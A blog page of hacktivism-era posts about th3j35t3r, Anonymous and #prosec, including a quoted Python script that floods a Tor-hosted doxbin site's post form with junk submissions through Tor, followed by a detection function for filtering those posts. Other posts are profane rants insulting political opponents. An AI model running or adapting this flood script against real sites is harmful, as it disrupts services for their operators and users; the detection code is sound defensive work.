Posts for: #Prosec

th3j35t3r: Was it really that tough to figure out?

I’ve been watching the tweets of @cubespherical with a sense of irony in the back of my mind. The story is so far-fetched, the monetary goal beyond ridiculous. I won’t present a whole lot of reference material in this post; it’s merely an insomniac’s rant. However, read through and you just might agree with a few of my points.

First and foremost, if you’ve kept up with @th3j35t3r’s (now defunct) twitter account, you’ve seen “a certain writing style”. What’s more, if you’ve used IRC at all in places he has been known to lurk, you’ve seen a few writing styles. I’ve seen jester’s writing style jump from proper capitalization to apropos internet junkie shorthand. Either this guy has MPD, or he’s a fucking SE master. Then again, there is a more likely explanation, one that’s been put forth on the internet but actually disregarded. It’s quite likely jester does have MPD, in that the identity is/was comprised of several individuals. The identity amounted to no more than a puppet of several people with a common goal.


The Anti-Anonymous Movement

Anonymous has had some bad eggs in its time. There have been violent adherents, bad ideas, and blemishes all around. The spirit of revolution and change for the better has been pockmarked by bad decisions due to a select few not following any ethical path. The movement is large and diverse, though, with many participants. “The Internet Hate Machine” as it was once known is dead; they’re now just a bunch of kids wanting governments and corporations to behave, or else.


#Prosec Attacks on Doxbin

Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP connection to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from earlier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self-explanatory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.
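From the receiving side, the script above is easy to fingerprint: each field is the SHA-224 digest of a single character from a 62-character alphabet, so only 62 distinct values can ever appear in "naem" or "dox". Because the posts arrive over Tor at a 30-second interval, source address and request rate are poor signals, and a content check is the practical filter. The sketch below is an added example, not code from the original post or from doxbin; the function names and the sample submissions are constructed for illustration.

```python
import hashlib
from urllib.parse import parse_qs

# Alphabet copied from the script above. Each field it sends is the SHA-224
# hex digest of ONE character from this string, so the "random" garbage is
# drawn from a fixed set of 62 values.
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
FLOOD_DIGESTS = frozenset(
    hashlib.sha224(c.encode("ascii")).hexdigest() for c in ALPHABET
)


def is_flood_post(body: str) -> bool:
    """True if a form-encoded POST body matches the script's naem/dox pattern."""
    fields = parse_qs(body, keep_blank_values=True)
    naem = fields.get("naem", [""])[0].strip().lower()
    dox = fields.get("dox", [""])[0].strip().lower()
    # Require both fields to match so an ordinary post is never rejected
    # just because one field happens to look like a hex string.
    return naem in FLOOD_DIGESTS and dox in FLOOD_DIGESTS


def triage(bodies):
    """Split submissions into (kept, rejected) lists, preserving order."""
    kept, rejected = [], []
    for body in bodies:
        (rejected if is_flood_post(body) else kept).append(body)
    return kept, rejected


def _digest(text: str) -> str:
    return hashlib.sha224(text.encode("ascii")).hexdigest()


# Constructed sample submissions (not captured traffic).
SAMPLE = [
    "naem=%s&dox=%s" % (_digest("a"), _digest("Z")),   # what the script sends
    "naem=example+entry&dox=some+free+text+here",      # ordinary submission
    "naem=%s&dox=free+text" % _digest("7"),            # only one field matches
    "naem=%s&dox=%s" % (_digest("ab"), _digest("q")),  # two-char digest: no match
]

if __name__ == "__main__":
    kept, rejected = triage(SAMPLE)
    print(len(kept), "kept;", len(rejected), "rejected")
```
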


Musings on Information Security

I’ve been thinking a lot lately about the “PsyOPS” and “InfoSec” professionals that are wildly chasing hackers all over the internet. People claim they’re so elite because they’re infiltrating A GROUP THAT ANYONE CAN JOIN, REGARDLESS OF RACE, CREED, OR RELIGION. I guess it’s tacitly not infiltration, as I’m sure some of the “legit” members don’t have the group’s best interest at heart, for various reasons. So if you’re claiming to be “Destroyer of Anonymous”, you fail at life. You’re a fucking loser, an asshat. The reality is that Anonymous is destroying itself. It swells and declines. It will always eliminate parts of itself. Kind of like pruning. No group with such radical and diverse beliefs can remain cohesive. However, all “#prosec” douchebags are typically Republican, Bradley Manning-hating government suckups who shit on the first amendment and would love to see all Arab Americans die. These are not generalizations; these fucking nutbags still have sore tits over 9/11. At least, the “Twitter vocal” ones are that way. It’s ironic. If you want to gain support for your cause of “hating Anonymous”, wouldn’t you be nicer than a nazi? My guess is “mudsplatter / hubris” is still on the #prosec side of the fence, hunting Anonymous down with PsyOPS and trolling. However, he’s playing good cop at the moment. The minds at Backtrace Security likely discovered that being raging douches from all angles doesn’t get you very far. So riding high on the crest of “namshub.pdf” and the fact that all their dox came from the fallout just before HBGary, they’re trying like Hell to prove they’re actually worth something to the internet, and not just screaming trolls.
